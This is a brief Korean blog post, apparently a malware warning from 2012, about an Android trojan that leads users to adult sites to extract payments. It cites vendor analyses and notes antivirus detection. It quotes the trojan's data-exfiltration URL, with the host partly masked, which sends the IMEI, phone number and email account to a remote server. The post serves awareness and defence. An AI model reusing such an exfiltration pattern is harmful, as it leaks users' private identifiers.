안드로이드(Android), 성인 사이트로 이동 후 결제를 유도하는 "Trojan.Android.Jporn.A" 주의!!

최근 안드로이드의 악성어플의 등장이 잦아지면서 여러종류의 악성행위들이 나오고 있다.
2012년은 안드로이드 악성코드의 해가 되지 않을까 싶다 ㅠ.ㅠ

자세한건 집에서 다시 분석해서 올리고 간단하게만 정리~~

• Symantec 분석 자료 : Android.Oneclickfraud

• Trendmicro 분석 자료 : ANDROIDOS_FAKETIMER.A

• nProtect 분석 자료 : [주의]일본 음란 사이트에서 배포 중인 안드로이드 악성파일 발견

일반적인 데스크탑PC에서 인터넷을 통해 접속을 해서 apk 파일을 다운로드 받을 수 있으며,
모바일로 접속하여 apk를 바로 다운로드 하여 설치할 수 있다.

악의적인 행위로는 [사용자 Email 계정, IMEI, 전화번호] 를 수집하여 외부로 전송한다.

"http://ibb****om.com/send.php?a_id=[IMEI]&telno=[전화번호]&m_addr=[Email 계정]&usr_id=[NULL]"

 

해당 어플은 알약 모바일에서 "Trojan.Android.Jporn.A" 로 탐지 된다.

나머지는 집에서^^;